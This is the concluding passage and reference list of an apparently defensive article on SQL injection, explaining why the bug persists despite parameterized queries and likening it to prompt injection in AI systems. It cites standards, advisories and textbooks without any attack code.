SQL injection is the rare class that is both completely understood and completely endemic. The reason is not ignorance of the fix. The headline cause is that the fix is "parameterize values," and real applications must vary query shape: sorts, filters, searches, reports, and generated queries. Those are the parts parameterization cannot reach. But the survival of the bug is also operational, as this article has traced: driver defaults that drift on upgrade, privileges that creep, background jobs and second-order paths nobody tests, generated SQL from a model, and verification that never reaches the authenticated paths where it hides. Those gaps are where injection survives, and they are also the corners cut under deadline.
Step back and SQL injection and prompt injection are the same boundary failure at different layers: trusted instructions and untrusted data sharing one channel. The difference is that databases handed us a real boundary, the prepared statement, that separates the two at the protocol level, and even with that boundary in hand the bug never went away, because it does not reach the parts of SQL that have to vary. The lesson carries straight into AI security: an enforceable boundary is the best thing a platform can give you, and it only protects the places you actually use it.
References and further reading
The specifics above are drawn from the standards bodies, primary documentation, and research that define and document this class. Worth keeping close:
- CISA / FBI advisory AA23-158A on the Cl0p exploitation of CVE-2023-34362 (MOVEit), including the LEMURLOOT web shell, the source for the MOVEit details here.
- Rain Forest Puppy (Jeff Forristal), "NT Web Technology Vulnerabilities", Phrack #54 (1998), the first public documentation of the technique now called SQL injection.
- Chris Anley, "Advanced SQL Injection in SQL Server Applications" (NGSSoftware, 2002), the foundational technical paper that mapped out exploitation depth.
- CWE-89 (SQL Injection) and OWASP Top 10 A05:2025 Injection, the canonical taxonomy.
- OWASP Top 10 for LLM Applications, LLM01:2025 Prompt Injection, the authoritative anchor for the generated-SQL risk and the prompt-injection parallel.
- OWASP cheat sheets: SQL Injection Prevention and Query Parameterization, plus the SQL Injection attack reference.
- PostgreSQL documentation: Row Security Policies and Writing SECURITY DEFINER Functions Safely, the primary source for the RLS and least-privilege containment above.
- OWASP Web Security Testing Guide: Testing for SQL Injection and Testing for NoSQL Injection, the methodology behind the verification section.
- PortSwigger Web Security Academy: the SQL injection labs and the DBMS-specific SQL injection cheat sheet, hands-on for the channels, dialects, and fingerprinting covered here.
- sqlmap, the open-source tool that automates the detection and exploitation path described under "Automated, and at scale."
- Justin Clarke, SQL Injection Attacks and Defense, 2nd edition (Syngress, 2012), the book-length treatment, broad and deep across databases, channels, and exploitation and defense techniques.
- Chris Shiflett, "Addslashes Versus mysql_real_escape_string", the classic write-up of the GBK multibyte escaping bypass.